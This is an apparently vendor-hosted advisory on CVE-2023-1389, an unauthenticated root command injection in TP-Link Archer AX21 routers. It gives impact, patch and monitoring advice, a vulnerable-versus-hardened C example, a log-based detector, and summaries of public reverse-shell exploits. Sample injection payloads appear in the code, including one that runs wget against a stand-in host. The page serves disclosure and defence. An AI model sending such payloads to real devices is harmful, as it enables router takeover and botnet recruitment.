Mallory
High | CISA KEV | Exploited in the wild | Public exploit

Unauthenticated Command Injection in TP-Link Archer AX21 /locale Endpoint

Identifiers: CVE-2023-1389, CWE-78. Also known as: zdi_23_451

CVE-2023-1389 is an unauthenticated command injection vulnerability in TP-Link Archer AX21 (AX1800) routers running firmware before 1.1.4 Build 20230219. The flaw sits in the web management interface's locale API at /cgi-bin/luci;stok=/locale, specifically the write operation of the country form; the stok value in that path is a session token, and it is empty because the handler does not require one. The country parameter is incorporated into a shell command string and executed via popen() without sanitization; public analysis places the vulnerable code path in the set_country handler and the merge_country_config / merge_config_by_country routines. Because attacker-controlled input reaches /bin/sh without neutralization (CWE-78), a remote attacker who can reach the interface can send a crafted HTTP request (the public PoCs use both GET and POST) and inject arbitrary shell commands, which run as root on the router.
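
The pattern described above, as an added example that is not TP-Link's code and not from this page: a C stand-in for the vulnerable handler (request value spliced into a command line destined for popen()) beside a hardened version that allowlists the locale and builds an argv with no shell in the path. The command path /usr/sbin/merge_country_config, the function names and the five-entry allowlist are assumptions made for illustration.

```c
/* Added example, not TP-Link's code and not from the Mallory page: the
 * CWE-78 shape behind CVE-2023-1389 next to a hardened replacement. The
 * command path, the function names and the locale allowlist are
 * assumptions made for illustration. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Vulnerable shape: the request's "country" value is spliced into a shell
 * command line that the handler later hands to popen(). /bin/sh parses the
 * whole string, so $(...), ;, |, & and backticks inside the value run as
 * root. The script path is a hypothetical stand-in for merge_country_config. */
int build_country_cmd_vulnerable(const char *country, char *cmd, size_t cmd_len)
{
    int n = snprintf(cmd, cmd_len, "/usr/sbin/merge_country_config %s", country);
    return (n < 0 || (size_t)n >= cmd_len) ? -1 : 0;
}

/* Hardened, step 1: allowlist validation. A locale is exactly two ASCII
 * uppercase letters AND one the firmware ships (constructed table). Reject,
 * do not "clean up": escaping metacharacters is how these bugs come back. */
static const char *const ALLOWED_COUNTRIES[] = { "US", "GB", "DE", "FR", "JP", NULL };

bool country_code_is_valid(const char *country)
{
    if (country == NULL || strlen(country) != 2) return false;
    if (!isupper((unsigned char)country[0]) || !isupper((unsigned char)country[1])) return false;
    for (size_t i = 0; ALLOWED_COUNTRIES[i] != NULL; i++)
        if (strcmp(country, ALLOWED_COUNTRIES[i]) == 0) return true;
    return false;
}

/* Hardened, step 2: no shell at all. Build an argv for execv()/posix_spawn()
 * so the value is a single argument that /bin/sh never reparses. Returns the
 * number of argv entries (excluding the NULL terminator) or -1 on rejection. */
int build_country_argv(const char *country, const char *argv[], size_t argv_len)
{
    if (argv_len < 3 || !country_code_is_valid(country)) return -1;
    argv[0] = "/usr/sbin/merge_country_config";
    argv[1] = country;
    argv[2] = NULL;
    return 2;
}

/* Demonstration on a payload of the shape the public PoCs use: the vulnerable
 * builder embeds it verbatim, the hardened path refuses it. */
int main(void)
{
    char cmd[256];
    const char *argv[3];
    const char *payload = "US$(id>/tmp/out)";

    if (build_country_cmd_vulnerable(payload, cmd, sizeof cmd) == 0)
        printf("vulnerable builder would run: %s\n", cmd);   /* popen(cmd, "r") here = root RCE */
    printf("hardened path with payload: %s\n", build_country_argv(payload, argv, 3) < 0 ? "rejected" : "accepted");
    printf("hardened path with \"US\": %s\n", build_country_argv("US", argv, 3) < 0 ? "rejected" : "accepted");
    return 0;
}
```

Compile with `cc -Wall example.c` and run: the vulnerable builder prints a command line with $(id>/tmp/out) embedded, which is exactly the string popen() would hand to /bin/sh, while the hardened path rejects it and accepts "US". The two fixes are independent and both matter: validation rejects rather than escapes, and execution bypasses the shell, so even a future gap in the allowlist cannot turn back into command injection.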


ANALYST BRIEF

Impact, mitigation & remediation

What it means. What to do now. Patch path, mitigations, and the assume-compromise checklist.

Impact

What an attacker gets, and what they’ve been doing with it.

Successful exploitation gives an unauthenticated remote attacker arbitrary command execution as root on the router, which amounts to full device compromise: installation of malware or botnet payloads, persistence attempts, configuration tampering (DNS, port forwarding, remote management settings), interception or manipulation of traffic transiting the device, a foothold into the LAN behind it, and use of the device for follow-on activity such as DDoS participation. Multiple public reports note active in-the-wild exploitation by Mirai-derived and other botnets, and the CVE is listed in CISA's Known Exploited Vulnerabilities catalog.

Mitigation

If you can’t patch tonight, do this now.

If immediate patching is not possible, restrict exposure of the router's web management interface to trusted networks only: disable remote (WAN-side) administration where it is not required, and block inbound access to /cgi-bin/luci from the WAN with upstream ACLs. Because the vulnerable handler needs no authentication, strong administrator credentials do not prevent exploitation; still replace default or weak passwords, since they limit what a compromised device exposes. Monitor for unexpected requests (GET or POST) to /cgi-bin/luci;stok=/locale that invoke the country form's write operation, especially from WAN addresses or with shell metacharacters in the country value; note that POST bodies do not appear in ordinary access logs, so body inspection requires a proxy or IDS in the path. Also watch for suspicious process execution on the device and for the botnet indicators that follow (unexpected outbound connections, changed DNS settings). Network segmentation and ACLs limiting access to the management plane reduce exploitability until the firmware is updated.
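
A detector for the monitoring advice above, as an added example that is not from this page and not a vendor rule: a C classifier for web-server access-log lines that flags writes to the locale form whose country value carries shell metacharacters. The log lines are constructed for the example; the parameter names form=country and operation=write are assumed from the public PoCs rather than confirmed by this page, and the path match is deliberately loose because the PoCs use /cgi-bin/luci/;stok=/locale with a slash while the advisory writes /cgi-bin/luci;stok=/locale. A POST body is not visible in an access log, so such writes are flagged for body inspection rather than judged.

```c
/* Added example, not from this page and not a vendor rule: classify access-log
 * lines for the request shape CVE-2023-1389 exploitation leaves behind. The
 * sample lines are constructed; form=country / operation=write are assumed
 * parameter names taken from the public PoCs. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_TARGET 1024
#define MAX_VALUE  256
enum { LOCALE_PARSE_ERROR = -1, LOCALE_BENIGN = 0, LOCALE_ANOMALOUS = 1, LOCALE_INJECTION = 2 };

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode src into dst ('+' becomes space); false if dst is too small. */
static bool url_decode(const char *src, char *dst, size_t dst_len)
{
    size_t j = 0;
    for (size_t i = 0; src[i] != '\0'; i++) {
        if (j + 1 >= dst_len) return false;
        if (src[i] == '%' && src[i + 1] != '\0' && src[i + 2] != '\0') {
            int hi = hexval((unsigned char)src[i + 1]), lo = hexval((unsigned char)src[i + 2]);
            if (hi >= 0 && lo >= 0) { dst[j++] = (char)(hi * 16 + lo); i += 2; continue; }
        }
        dst[j++] = (src[i] == '+') ? ' ' : src[i];
    }
    dst[j] = '\0';
    return true;
}

/* Copy the raw (still encoded) value of query parameter `name` into out. */
static bool get_param(const char *query, const char *name, char *out, size_t out_len)
{
    size_t nlen = strlen(name);
    for (const char *p = query; *p != '\0';) {
        const char *amp = strchr(p, '&');
        const char *tok_end = amp ? amp : p + strlen(p);
        const char *eq = memchr(p, '=', (size_t)(tok_end - p));
        size_t klen = (size_t)((eq ? eq : tok_end) - p);
        if (klen == nlen && memcmp(p, name, nlen) == 0) {
            size_t vlen = eq ? (size_t)(tok_end - eq - 1) : 0;
            if (vlen >= out_len) return false;
            memcpy(out, eq ? eq + 1 : tok_end, vlen);
            out[vlen] = '\0';
            return true;
        }
        if (!amp) break;
        p = amp + 1;
    }
    return false;
}

/* One Common/Combined Log Format line in, verdict out. */
int classify_log_line(const char *line)
{
    char target[MAX_TARGET], raw[MAX_VALUE], country[MAX_VALUE];
    const char *q = strchr(line, '"');
    if (!q) return LOCALE_PARSE_ERROR;
    const char *start = strchr(q + 1, ' ');               /* skip the method */
    if (!start) return LOCALE_PARSE_ERROR; ++start;
    const char *end = strchr(start, ' ');                 /* before "HTTP/1.x" */
    if (!end || (size_t)(end - start) >= sizeof target) return LOCALE_PARSE_ERROR;
    memcpy(target, start, (size_t)(end - start));
    target[end - start] = '\0';
    /* ";stok=/locale" catches both /cgi-bin/luci;stok=/locale and the PoCs'
     * /cgi-bin/luci/;stok=/locale; an empty stok on a write is the tell. */
    if (!strstr(target, "/cgi-bin/luci") || !strstr(target, ";stok=/locale")) return LOCALE_BENIGN;
    const char *query = strchr(target, '?');
    if (!query) return LOCALE_BENIGN;
    ++query;
    if (!get_param(query, "form", raw, sizeof raw) || strcmp(raw, "country") != 0) return LOCALE_BENIGN;
    if (!get_param(query, "operation", raw, sizeof raw) || strcmp(raw, "write") != 0) return LOCALE_BENIGN;
    /* A write whose country is not in the URL (POST body, not logged) needs body inspection. */
    if (!get_param(query, "country", raw, sizeof raw)) return LOCALE_ANOMALOUS;
    if (!url_decode(raw, country, sizeof country)) return LOCALE_ANOMALOUS;
    if (strpbrk(country, "$`;|&()<>{}\n\r") != NULL) return LOCALE_INJECTION;
    /* Anything but a two-letter code is off-profile for this form. */
    if (strlen(country) != 2 || !isalpha((unsigned char)country[0]) || !isalpha((unsigned char)country[1]))
        return LOCALE_ANOMALOUS;
    return LOCALE_BENIGN;
}

/* Constructed sample log (not real traffic); addresses are from documentation ranges. */
static const char *const SAMPLE_LOG[] = {
    "192.0.2.10 - - [25/Dec/2023:10:00:00 +0000] \"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28id%3E%2Ftmp%2Fout%29 HTTP/1.1\" 200 45",
    "192.0.2.11 - - [25/Dec/2023:10:00:01 +0000] \"GET /cgi-bin/luci;stok=/locale?form=country&operation=write&country=US HTTP/1.1\" 200 45",
    "192.0.2.12 - - [25/Dec/2023:10:00:02 +0000] \"GET /cgi-bin/luci;stok=/locale?form=lang&operation=read HTTP/1.1\" 200 45",
    "192.0.2.13 - - [25/Dec/2023:10:00:03 +0000] \"GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=US%3Bwget%20http%3A%2F%2F198.51.100.5%2Fx HTTP/1.1\" 200 45",
    "192.0.2.14 - - [25/Dec/2023:10:00:04 +0000] \"GET /cgi-bin/luci;stok=/locale?form=country&operation=write&country=USA HTTP/1.1\" 200 45",
    "192.0.2.15 - - [25/Dec/2023:10:00:05 +0000] \"POST /cgi-bin/luci/;stok=/locale?form=country&operation=write HTTP/1.1\" 200 45",
};
#define SAMPLE_LOG_COUNT (sizeof SAMPLE_LOG / sizeof SAMPLE_LOG[0])

int main(void)
{
    static const char *const names[] = { "parse error", "benign", "anomalous", "injection" };
    for (size_t i = 0; i < SAMPLE_LOG_COUNT; i++)
        printf("line %zu: %s\n", i, names[classify_log_line(SAMPLE_LOG[i]) + 1]);
    return 0;
}
```

Run it over a real access log one line at a time and alert on LOCALE_INJECTION outright; LOCALE_ANOMALOUS is a triage queue (odd country values and POST writes whose body was not logged). Decode before matching: the first sample's country arrives as %24%28id%3E%2Ftmp%2Fout%29, and a rule that only greps the raw URL for "$(" would miss it.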

Remediation

Patch, then assume compromise.

Upgrade affected TP-Link Archer AX21 devices to fixed firmware: vulnerable builds are firmware versions before 1.1.4 Build 20230219, and TP-Link issued firmware updates in March 2023 that correct the issue. Apply the latest vendor firmware for the specific hardware revision (TP-Link firmware is revision-specific, so check the version printed on the device label before downloading) and verify afterwards that the device reports a non-vulnerable build. Then assume compromise for any device that was reachable while unpatched: given the active botnet exploitation noted above, reboot after the upgrade, review the configuration for tampering (DNS servers, port forwarding, remote management settings), rotate the administrator password, and check for the botnet indicators listed under Mitigation.
PUBLIC EXPLOITS

Exploits

2 valid exploits after Mallory filtered fakes, detection scripts, and README-only repos (1 hidden).

Valid: 2 / 3 total

CVE-2023-1389 | Maturity: PoC | Verified exploit

This repository is a Go-based proof-of-concept exploit for CVE-2023-1389, targeting TP-Link Archer AX21 routers vulnerable to unauthenticated command injection. The main file, main.go, reads a list of target IP addresses from 'list.txt' and attempts to exploit each by sending a crafted HTTPS request to the /cgi-bin/luci/ endpoint, injecting a reverse shell payload. The payload causes the target device to connect back to the attacker's netcat listener, granting a remote shell. The exploit supports concurrent execution using goroutines and a concurrency manager. The repository includes a README with usage instructions, a Go module definition, and dependencies for command-line flag parsing and concurrency control. No detection or scanning functionality is present; the tool is strictly for exploitation. The main attack vector is network-based, exploiting a web interface on the target devices.

werwolfz | Disclosed Dec 25, 2023 | go | network

CVE-2023-1389 | Maturity: PoC | Verified exploit

This repository contains two Python proof-of-concept exploits for CVE-2023-1389, an unauthenticated command injection vulnerability in the TP-Link Archer AX21 (AX1800) router's web management interface. The vulnerability exists in the 'country' parameter of the 'write' callback at the '/cgi-bin/luci/;stok=/locale' endpoint, allowing arbitrary command execution as root without authentication.

- 'archer-file-transfer.py' executes arbitrary commands on the router and exfiltrates their output by writing it to '/tmp/out' and transferring that file via netcat to the attacker's machine.
- 'archer-rev-shell.py' provides a simpler method to obtain a reverse shell on the attacker's system using netcat.

Both scripts require the attacker to specify the router's IP, their own IP, and a listening port. The exploit works by sending crafted GET requests to the vulnerable endpoint, leveraging command injection in the 'country' parameter. The README provides usage instructions and mitigation advice. The repository is structured with a README and two Python scripts, both of which are functional proof-of-concept exploits for the described vulnerability.

Voyag3r-Security | Disclosed Jul 28, 2023 | python | network
EXPOSURE SURFACE

Affected products & vendors

Products and vendors Mallory has correlated with this vulnerability. Open in Mallory to drill down to specific CPE configurations and version ranges.

Vendor | Product | Type
TP-Link | Archer AX21 Firmware | operating_system

Vendor-confirmed product mapping. Mallory continuously reconciles this list against your asset inventory.

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets are affected, which adversaries are exploiting it right now, which detections to deploy, and what to do tonight.
- Exposure mapping: query your assets running an affected version, and investigate the blast radius.
- Threat actor evidence (1): every observed campaign linking this CVE to a named adversary.
- Associated malware (22): malware families riding this exploit, with evidence and IOCs.
- Detection signatures (2): YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
- Vendor-by-vendor mapping: cross-references every affected SKU, including bundled OEM variants.
- Social activity (11): community discussion across Reddit, Mastodon, and other social sources.